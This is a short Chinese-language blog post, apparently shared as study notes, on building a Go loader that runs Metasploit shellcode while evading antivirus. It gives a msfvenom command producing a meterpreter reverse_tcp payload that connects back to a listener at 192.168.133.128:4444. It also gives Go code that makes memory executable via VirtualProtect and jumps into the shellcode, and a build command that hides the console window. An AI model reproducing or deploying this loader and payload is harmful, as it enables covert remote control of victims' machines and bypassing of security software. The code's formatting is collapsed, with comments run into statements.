分享 | Go編寫loader加載shellcode免殺學習

一簡單實現

（1）msf生成shellcode，選擇輸出hex格式。

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.133.128 lport=4444 -f hex

（2）使用Go編寫loader代碼。

package main
import ( 'encoding/hex' 'fmt' 'os' 'syscall' 'unsafe')
var procVirtualProtect = syscall.NewLazyDLL('kernel32.dll').NewProc('VirtualProtect') //syscall是調用函數 通過call NewLazyDLL來調取kernel32.dll（及其重要的鏈接庫 幾乎所有的木馬都會調用這個函數）NewProc是指api NewProc('VirtualProtect')就是獲取VirtualProtect這個函數的api//保護內存函數 去掉特征func VirtualProtect(a unsafe.Pointer, b uintptr, c uint32, d unsafe.Pointer) { //轉換爲同一類型的地址 uintptr，uint32 t, _, _ := procVirtualProtect.Call( uintptr(a), uintptr(b), uintptr(c), uintptr(d)) fmt.Print(t)}func Run(sc []byte) { //定義函數 f := func() {} var old uint32 //一級指針的值爲f的地址 //unsafe.Pointer(*(**uintptr)(unsafe.Pointer( f))) 將 f轉換爲1級指針的地址 unsafe.Sizeof(uinpter(0))保護的蓡數爲0 unint32(0x40)flNewProtect，內存新的屬性類型，設置爲PAGE_EXECUTE_READWRITE（0x40）時該內存頁爲可讀可寫可執行 VirtualProtect(unsafe.Pointer(*(**uintptr)(unsafe.Pointer( f))), unsafe.Sizeof(uintptr(0)), uint32(0x40), unsafe.Pointer( old)) //將shellcode 放入函數中 sc爲shellcode的地址 **(**uintptr)(unsafe.Pointer( f))就是將shellcode的地址賦值給了 f的地址 **(**uintptr)(unsafe.Pointer( f)) = *(*uintptr)(unsafe.Pointer( sc)) var orgshellcode uint32 //shellcode地址 VirtualProtect(unsafe.Pointer(*(*uintptr)(unsafe.Pointer( sc))), uintptr(len(sc)), uint32(0x40), unsafe.Pointer( orgshellcode)) f() //這裡調用f函數 f的地址通過**(**uintptr)(unsafe.Pointer( f)) = *(*uintptr)(unsafe.Pointer( sc))被更改爲shellcode的地址 然後VirtualProtect(unsafe.Pointer(*(*uintptr)(unsafe.Pointer( sc))),uintptr(len(sc)),uint32(0x40),unsafe.Pointer( orgshellcode))保護了shellcode的內存地址}func main() { //解密 x, _ := hex.DecodeString(os.Args[1]) Run(x)}

（3）編譯exe。

go build -ldflags '-s -w -H=windowsgui' 1.go